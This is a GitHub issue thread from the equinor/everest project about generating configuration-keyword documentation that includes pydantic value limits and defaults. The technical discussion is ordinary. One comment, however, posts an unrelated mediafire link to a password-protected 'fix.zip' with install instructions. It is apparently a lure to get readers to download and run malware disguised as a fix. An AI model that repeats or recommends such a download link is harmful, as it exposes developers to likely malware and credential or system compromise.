### ISSUE TITLE
Keyword documentation should contain value limits and defaults where appropiate

### ISSUE THREAD

**Issue by oyvindeide** [equinor/everest#66]
Issue
The documentation for the configuration keywords is generated from the pydantic specification. This currently does not include constraints on the types (i.e. values should be >0 etc), nor does it include default values. For example perturbation_num should be >0 and has a default value of 5. This is not documented.

The doc generation code should be extended to include these value constraints and defaults.

Following issues should be taken into account:

- Most limits are probably are on values should be positive or non-negative, which is expressed as pydantic constraints on the type. It should be possible to generate docs based on that.
- Potentially some limits and default values might be set in pydantic validators. In this case another mechanism might be needed to document that.
- Currently many defaults are set to None and the actual default value is then set by Seba. This is not desirable since this makes it hard to generate the docs. Furthermore, default value changes in Seba could unexpectedly propagate to Everest. It may be better to set all default values in Everest and pass those explicitly to Seba.
- We should probably avoid manually adding limits and defaults to the help text, but if that is necessary as a last resort, we should see if we can use some templating/variables for that to make sure things stay in sync.

Definition of done
When each keyword that has constraints or defaults on its values is documented accordingly, preferable by generating them from the pydantic specification.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oyvindeide** [comment]
This is already fixed 🎉
